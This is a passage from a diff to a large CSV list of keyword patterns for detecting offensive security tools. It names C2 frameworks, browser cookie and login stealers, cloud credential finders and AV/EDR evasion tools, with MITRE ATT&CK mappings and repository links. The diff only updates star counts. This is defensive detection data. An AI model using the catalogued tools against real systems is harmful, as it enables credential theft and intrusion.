tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*SharpBypassUAC.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpBypassUAC.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpC2 *","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2*.cs*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2*.exe*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" @@ -16518,73 +16701,73 @@ "*SharpC2Webhook*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpCalendar.exe*","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z" "*SharpCat.exe*","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","16","5","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z" -"*SharpChisel.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpChrome backupkey*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpChrome.cs*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpChrome.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*sharpchromium *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpChisel.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpChrome backupkey*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpChrome.cs*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpChrome.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharpchromium *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*SharpChromium.csproj*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*SharpChromium.exe*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" -"*SharpChromium.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpChromium.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpChromium.sln*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*SharpChromium-master*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*SharpClipHistory*","offensive_tool_keyword","SharpClipHistory","SharpClipHistory is a .NET 4.5 application written in C# that can be used to read the contents of a users clipboard history in Windows 10 starting from the 1809 Build.","T1115 - T1113 - T1015 - T1053 - T1059","TA0003 - TA0007","N/A","N/A","Information Gathering","https://github.com/FSecureLABS/SharpClipHistory","1","1","N/A","N/A","2","179","36","2020-01-23T13:39:13Z","2019-04-25T22:17:08Z" "*sharpcloud.cna*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*SharpCloud.csproj*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*SharpCloud.exe*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" -"*SharpCloud.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpCloud.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpCloud.sln*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*SharpCloud-master*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" -"*SharpCOM.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpCOM.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpCOMManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*sharpcompile*.exe*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*sharpCompileHandler*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*SharpCompileServer*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*SharpCompileServer.exe*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" -"*SharpConfigParser.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*sharpcookiemonster*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpConfigParser.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion 